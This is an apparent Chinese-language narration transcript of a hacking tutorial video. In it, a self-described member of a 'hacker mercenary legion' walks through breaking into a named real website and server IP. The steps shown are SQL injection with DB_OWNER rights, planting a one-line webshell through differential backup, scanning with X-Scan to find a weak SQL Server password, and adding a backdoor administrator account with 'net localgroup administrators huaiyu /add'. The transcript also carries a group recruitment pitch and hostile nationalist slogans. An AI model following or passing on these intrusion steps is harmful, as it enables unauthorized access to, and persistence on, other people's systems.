动画介绍:大家好!我是黑客雇佣军团第二小组的怀雨!
前几天我们军团的一个成员入侵了一个网站!并拿下了服务器。
但被管理员限制了!他找到我!让我看看!
我今天从新拿下服务器!
就是这个网站!
http://www.010zf.com/
好吧!跟着我的思路来!
我们入侵网站常用的方法就几种
我今天用的是注入!嘿!我也是菜鸟一个!
由于表示入侵的真实性!我没有准备!下面一起来看看!
先下工具!????没有注入点?不是吧!这么不给面子!嘿嘿!
我们先找下注入点!晕了!网卡。。。。无语!好了,
注入下!是SQL的DB_OWNER的权限!拿下WEBSHELL不成问题!有这个权限!
我们拿阿D吧!行了!我们用差异备分!
先列下目录!010zf不错的话应该是这个!???hack.asp?被人黑过?
嗯!有这个页面!不过好像被转了!D:\publish\010zf\www\这个就是本地的路径了!
我们备分试下!
行了!访问下看看成功了没!成功!
我们用一句话来连下!我这里的密码是 a 大家可以改!好!我们用海洋来连下!
810417密码!好!行了!我们进去看下!管理员真TB晕了!再找找有什么可以利用的没有!
D:\publish\010zf\www晕!连这个也不允许?太不给面子了吧!
也许!到这!你们有没有想放弃了呢?反正用这个思路我是不行了!什么提权的我还是菜鸟!
晕!不行了!怎么办啊!唉!这种问题!对于我这么一个菜鸟来说!无从下手了!
对了!它是SQL的那就说明它开了1433的端口!我们换个思路!晕!端口入侵试试!看下它有什么漏洞!
一般测试安全的我喜欢用X-SCAN 这个!个人感觉!嘿嘿!希望能有什么突破了!
做个广告!我们军团在壮大中!加入黑客雇佣军团!不收任何费用!我们的目标就是打倒日本!
好了!下好了!看看先!~行了!忘了!看下IP先!218.246.34.83 服务器IP我先设置一下!看操作!
载入插件"I:\X-Scan-v3.2-beta\X-Scan-v3.2-beta\X-Scan-v3.2-beta\X-Scan-v3.2-beta\plugins\checkos.xpn"失败
载入插件"I:\X-Scan-v3.2-beta\X-Scan-v3.2-beta\X-Scan-v3.2-beta\X-Scan-v3.2-beta\plugins\snmp.xpn"失败
载入插件完毕晕!什么意思???命中注定么?
眼花了不是?SQL-Server弱口令: "test/123" 嘿嘿!哈哈!不是吧!
看下!SQL
我们试下!
看下它开了终端了没!
AUTOEXEC.BAT
2006-12-09 18:01 0 CONFIG.SYS
2006-12-24 20:14 <DIR> Documents and Settings
2006-12-17 00:06 <DIR> Program Files
2006-12-20 05:36 41,784 Result.txt
2006-12-09 19:36 <DIR> SQL2KSP4
2006-12-24 20:42 80 test.qry
2006-12-19 15:56 <DIR> WINDOWS
2006-12-09 18:02 <DIR> wmpub
4 个文件 41,864 字节
5 个目录 13,317,197,824 可用字节
嘿嘿!看到这!成功了一大半!嘿!开了终端!这下好了!还用说!建用户!
C:\>net localgroup administrators huaiyu /add
命令成功完成。
行了!进去看看!???我有办法!以前在哪看过有破最大连接的!
baidu找一下!不好意思!事先没有准备!
思路就是这样!当我们在WEBSHELL没有办法时!我们得换一下思路!
嘿嘿!入侵很简单!关键要灵活应用!最BT的管理员也有漏点!嘿嘿!
行了!logoff set local_echo 拿下服务器了!
嘿嘿!动画到这吧!成功入侵演示完毕 |
安全中国首页 > 动画中心 > 综合注入动画
